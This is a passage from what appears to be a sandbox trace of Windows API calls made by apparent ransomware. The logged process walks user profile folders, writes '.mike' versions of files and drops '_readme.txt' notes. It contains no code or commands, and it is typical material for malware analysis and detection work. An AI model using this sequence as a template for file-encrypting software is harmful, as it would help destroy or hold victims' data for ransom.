lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.596] WriteFile (in: hFile=0x1c8, lpBuffer=0x229bba8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x229bba8*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.597] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.598] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.598] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db", dwFileAttributes=0x80) returned 1 [0157.608] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", lpFilePart=0x0) returned 0x45 [0157.610] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.611] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.mike", lpFilePart=0x0) returned 0x4f [0157.611] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db", lpFilePart=0x0) returned 0x4a [0157.615] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.mike", lpFilePart=0x0) returned 0x4f [0157.616] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.mike", lpFilePart=0x0) returned 0x4f [0157.616] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db", dwFileAttributes=0x80) returned 1 [0157.617] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", lpFilePart=0x0) returned 0x45 [0157.619] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.619] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.mike", lpFilePart=0x0) returned 0x4f [0157.620] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db", lpFilePart=0x0) returned 0x4a [0157.624] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.mike", lpFilePart=0x0) returned 0x4f [0157.624] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.mike", lpFilePart=0x0) returned 0x4f [0157.624] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db", dwFileAttributes=0x80) returned 1 [0157.626] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", lpFilePart=0x0) returned 0x45 [0157.628] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.628] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.mike", lpFilePart=0x0) returned 0x50 [0157.629] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db", lpFilePart=0x0) returned 0x4b [0157.634] WriteFile (in: hFile=0x1c8, lpBuffer=0x22cc428*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x22cc428*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.634] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.mike", lpFilePart=0x0) returned 0x50 [0157.635] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db.mike", lpFilePart=0x0) returned 0x50 [0157.635] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db", dwFileAttributes=0x80) returned 1 [0157.636] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", lpFilePart=0x0) returned 0x45 [0157.638] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.639] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.mike", lpFilePart=0x0) returned 0x4f [0157.639] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db", lpFilePart=0x0) returned 0x4a [0157.643] WriteFile (in: hFile=0x1c8, lpBuffer=0x22dadfc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x22dadfc*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.644] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.mike", lpFilePart=0x0) returned 0x4f [0157.644] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.mike", lpFilePart=0x0) returned 0x4f [0157.644] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db", dwFileAttributes=0x80) returned 1 [0157.646] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\_readme.txt", lpFilePart=0x0) returned 0x45 [0157.648] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.648] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.648] CoTaskMemFree (pv=0x508980) [0157.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.649] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\GameExplorer", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\GameExplorer", lpFilePart=0x0) returned 0x3d [0157.649] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.649] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.650] CoTaskMemFree (pv=0x508980) [0157.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.650] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History", lpFilePart=0x0) returned 0x38 [0157.652] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.652] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.652] CoTaskMemFree (pv=0x508980) [0157.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.652] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5", lpFilePart=0x0) returned 0x44 [0157.653] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.653] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.653] CoTaskMemFree (pv=0x508980) [0157.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.654] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\Low", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\History\\Low", lpFilePart=0x0) returned 0x3c [0157.654] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.654] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.655] CoTaskMemFree (pv=0x508980) [0157.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.655] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Ringtones", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Ringtones", lpFilePart=0x0) returned 0x3a [0157.656] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.656] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.656] CoTaskMemFree (pv=0x508980) [0157.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.657] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", lpFilePart=0x0) returned 0x49 [0157.668] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.668] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.669] CoTaskMemFree (pv=0x508980) [0157.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.669] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5", lpFilePart=0x0) returned 0x55 [0157.674] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.674] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.675] CoTaskMemFree (pv=0x508980) [0157.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.675] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", lpFilePart=0x0) returned 0x5e [0157.676] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.676] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.677] CoTaskMemFree (pv=0x508980) [0157.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.677] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", lpFilePart=0x0) returned 0x5e [0157.678] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.678] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.678] CoTaskMemFree (pv=0x508980) [0157.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.678] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", lpFilePart=0x0) returned 0x5e [0157.679] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.679] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.679] CoTaskMemFree (pv=0x508980) [0157.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.680] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109", lpFilePart=0x0) returned 0x5e [0157.680] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.680] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.681] CoTaskMemFree (pv=0x508980) [0157.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.681] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low", lpFilePart=0x0) returned 0x4d [0157.684] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.684] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.684] CoTaskMemFree (pv=0x508980) [0157.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.685] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Virtualized", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Virtualized", lpFilePart=0x0) returned 0x55 [0157.685] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.685] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.685] CoTaskMemFree (pv=0x508980) [0157.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.686] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\WER", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\WER", lpFilePart=0x0) returned 0x34 [0157.686] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.686] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.687] CoTaskMemFree (pv=0x508980) [0157.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.687] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\WER\\ERC", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\WER\\ERC", lpFilePart=0x0) returned 0x38 [0157.688] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.688] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.688] CoTaskMemFree (pv=0x508980) [0157.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.688] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportArchive", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportArchive", lpFilePart=0x0) returned 0x42 [0157.689] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.689] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.689] CoTaskMemFree (pv=0x508980) [0157.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail", lpFilePart=0x0) returned 0x35 [0157.693] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0157.694] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.mike", lpFilePart=0x0) returned 0x44 [0157.694] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml", lpFilePart=0x0) returned 0x3f [0157.698] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.mike", lpFilePart=0x0) returned 0x44 [0157.698] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.mike", lpFilePart=0x0) returned 0x44 [0157.699] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml", dwFileAttributes=0x80) returned 1 [0157.700] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\_readme.txt", lpFilePart=0x0) returned 0x41 [0157.701] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0157.702] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat", lpFilePart=0x0) returned 0x45 [0157.708] WriteFile (in: hFile=0x1c8, lpBuffer=0x21617d8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21617d8*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 